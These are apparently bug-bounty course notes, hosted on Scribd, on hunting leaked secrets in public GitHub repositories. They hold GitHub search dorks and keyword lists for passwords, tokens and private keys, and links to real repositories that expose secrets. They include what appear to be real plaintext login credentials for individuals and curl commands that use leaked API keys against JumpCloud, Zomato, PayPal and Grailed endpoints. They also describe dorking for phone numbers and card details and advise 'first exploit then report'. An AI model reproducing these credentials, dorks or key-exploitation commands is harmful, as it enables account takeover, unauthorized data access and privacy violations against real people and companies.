Scribd
Upload
12 views

Github-Rcon-Exploit

5

Uploaded by

dokapo5462
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
12 views

Github-Rcon-Exploit

5

Uploaded by

dokapo5462
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 10

Information disclosure finding

Manual

Platform : Github

Notes:
1. First exploit then report
2. Don't make hurry
3. You will find multiple keys , tokens , data etc but wait for exploit lecture
4. Not every key or token you can exploit

https://github.com/jestboniface/IAU/blob/2f70378148df47a66f7dee1403f1ddedd5878670/
india%20(2).sql
https://github.com/lawithers001/WebScraping-Mongo/blob/
ebf9ae0d0dbdd4c4da230c460c28d85df837182c/mission_to_mars.ipynb
https://github.com/Thoma997/SDG-BERT/blob/
17903018b531a405002eaafb6f5cd90a7995dad7/settings.py

https://github.com/bethanysciences/Nokia-FHIR/blob/
7156392e8c7a6ae36fd292172eaaf5921aaeb510/nokia.md

https://github.com/walmartlabs/cookie-cutter/blob/
26503dc45c1187252b20358915dc14326db476a8/packages/azure/setup_env_vars_locally.sh

https://github.com/bethanysciences/Nokia-FHIR/blob/
7156392e8c7a6ae36fd292172eaaf5921aaeb510/nokia.md

https://github.com/electronicarts/ava-capture/blob/
5971809b04285804604938856996214b91bc50ce/website-backend/ava/ava/
dev_secure_settings.py

https://github.com/vinaykushwaha1985/setu/blob/
dd092fa195d9b26d69b7d4dfb08af42644e20eff/setu/src/main/resources/
application.properties

https://github.com/IBM/cloud-pak-deployer/blob/
11cda5eb204bb1a40332de78c0770a7dee5b156f/automation-roles/50-install-cloud-pak/
cp4waiops/cp4waiops-ai-manager-demo-content/tasks/45_aimanager-create-aiops-
application.yaml

https://github.com/electronicarts/ava-capture/blob/
5971809b04285804604938856996214b91bc50ce/website-backend/ava/ava/
dev_secure_settings.py

Third party : Agri10x -> TCS, Nokia

Org : Nokia -> Nokia


Website name: login.microsoftonline.com
Website URL: https://login.microsoftonline.com
Login name:
Login: t.mohite@somaiya.edu
Password: Ruchita@2414
Comment:
https://github.com/VivekBhat/bash_scripts/blob/
54e2502064b3988911c428a59cfd7bff57df3ca4/bash_profile_ubuntu

"site.com" access token


aws_access_key
aws_secret_key
api key
passwd
pwd
heroku
slack
firebase
swagger
aws_secret_key
aws key
password
ftp password
jdbc
db
sql
secret jet
config
admin
pwd
json
gcp
htaccess
.env
ssh key
.git
access key
secret token
oauth_token
oauth_token_secret

Recon

Code ratio is less than 3k : leave the target

nokia

https://github.com/bethanysciences/Nokia-FHIR/blob/
7156392e8c7a6ae36fd292172eaaf5921aaeb510/nokia.md
Dorks

dotfiles
filename:sftp-config.json password
filename:.s3cfg
filename:config.php dbpasswd
filename:.bashrc password
filename:.esmtprc password
filename:.netrc password
filename:_netrc password
filename:.env MAIL_HOST=smtp.gmail.com
filename:prod.exs NOT prod.secret.exs
filename:.npmrc _auth
filename:WebServers.xml
filename:sftp-config.json
filename:.esmtprc password
filename:passwd path:etc
filename:prod.secret.exs
filename:sftp-config.json
filename:proftpdpasswd
filename:travis.yml
filename:vim_settings.xml
filename:sftp.json path:.vscode
filename:secrets.yml password
extension:sql mysql dump
extension:sql mysql dump
extension:sql mysql dump password
extension:pem private
extension:ppk private

api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth

remove password
root
admin
log
trash
token
FTP_PORT
FTP_PASSWORD
DB_DATABASE=
DB_HOST=
DB_PORT=
DB_PASSWORD=
DB_PW=
DB_USER=
number

like: language:shell username


language:sql username
language:python ftp
language:bash ftp

ORG

Google

samsung github
nokia github
zomato github
tesla github

https://github.com/bethanysciences/Nokia-FHIR/blob/
7156392e8c7a6ae36fd292172eaaf5921aaeb510/nokia.md

https://github.com/Capricorn397/Dissertation-iOS/blob/
d8a516c3da429877067aed6719006bad1cbd2f84/Dissertation_1/AirshipConfig.plist

https://github.com/ydgros/ydgros.github.io/blob/
206fc7cdc6fc94859fdd5c75f9920966e5ec70e7/post/gong-zuo-liu-yong-dao-de-ruan-jian/
index.html

https://github.com/Shopify/goluago/blob/fe0528d0b2041b5122b8c170dfad8a5dc86516fb/
tst/crypto/aes/aes_test.lua

https://raw.githubusercontent.com/Shopify/storefront-api-learning-kit/
6f72f84fd4afce07f0113294f9912918df4de607/builds/storefront-api-learning-kit-
insomnia.json

https://github.com/electronicarts/ava-capture/blob/
5971809b04285804604938856996214b91bc50ce/website-backend/ava/ava/
dev_secure_settings.py

"gov.in" phone number

"dell.com" @dell.com
"@mastercard.com"
"mastercard.com" phone number
"mastercard.com" PH NO
"mastercard.com" ID

Verfication

Truecaller
Email Verifires
OSINT

gojek.com

Impact:
1. Personal Reputation
2. Company Reputation
3. IPO / Shares : Affect on market
4. Client Reduction
5. Finance

moehassan6832@gmail.com 3Wt4SikdHdQvXMr
login www.netflix.com 0 https://www.netflix.com/signup/regform
moehassan6832@gmail.com 3Wt4SikdHdQvXMr

GDPR
Hello team,

Aditya here , found a security issue in one of your domain . Please look into it

Title: Exposed .sql file disclosing sensitive information [Email,ID,Password]

Description:
The application does not properly prevent sensitive system-level information from
being accessed by unauthorized actors who do not have the same level of access to
the underlying system as the application does. .sql file is accessible to public
disclosing information non-authorized people

Steps:
1. Google query : site:uu.nl ext:sql | ext:dbf | ext:mdb
2. First URL : https://git.science.uu.nl/arjan/wt-p3/-/blob/master/init.sql
3. Scroll down or search for "password"

Impact:
1. Able to access information like id, login, password, firstname, last name, email
2. Visible product catalogue id, price, name, description, category, counter,
manufacturer, seller
Attacker can use this information for sell, use , deactivate user account ,
phishing etc

POC:
image.png

Dorking

Walmart , Zomato phone no , address , credit/debit card , upi id , city


20+

Walmart :
ST no
Ph no
CC detail
POstal Code
Postal Address

"walmart.com" Postal Address

zomato users
swiggy users
uber users

=======================================================

Exploits

Third Party : Zomato : Google Map API : Wordpress


Company Service : Uber : API
Detection : Key name , Service name

BASE URL

"filepicker_conversion_url":"https://
process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

curl -X POST \
-d
url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_dem
onstration_1.png/420px-PNG_transparency_demonstration_1.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

curl -X POST --data-binary @test.txt --header "Content-Type:plain/text"


"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

google query:

grailed.com api docs curl

paytm api docs curl


sement api docs curl
paypal api docs curl

curl --request GET \


--url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
--header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
--header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'

token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7

curl -v -X GET https://api-m.sandbox.paypal.com/v1/invoicing/invoices?


page=3&page_size=4&total_count_required=true \
-H "Content-Type: application/json" \
-H "Authorization:
E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"

curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e=\


{"event_type":"_active"\}start=20170301&end=20170321'
curl --header "X-Zomato-API-Key:7749b19667964b87a3efc739e254ada2"
"https://api.zomato.com/v1/search.json?city_id=1"

curl -X GET --header "Accept: application/json" --header "user-key:"


"https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"

curl -X GET --header "Accept: application/json" --header "user-key:


6aebfe02b9c7820ae965ccf5769fea39"
"https://developers.zomato.com/api/v2.1/restaurant?res_id=1"

1. Look for key name or service name


2. Look for target api docs curl
3. Look for curl command and exchange keys
4. Gather data or exploit

curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

API key exploit led to Blind SSRF, EXIF issue , Third party image upload

Hi team,

Aditya here , Found information disclosure bug . PLease look into it

Description: Disclosed API key to list user information

Developers are increasingly relying on cloud-based tools to automate building


code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.

There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.
Consider Your Data Compromised When You ro any Push a Commit
When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history

Key Found URL:


https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5
981/.env

Exploit:

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"


"https://console.jumpcloud.com/api/systems"

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7"


"https://console.jumpcloud.com/api/systems"

curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \


-u API_KEY:SECRET_KEY \
-F 'file=@"/path/to/file.csv"' \

399720f6f904f106e162cd2bd0011a6f

curl --location --request GET


'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?


q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?


lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

1. "zomato.com" api key


2. zomato api docs curl
3. curl
4. exchange keys

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy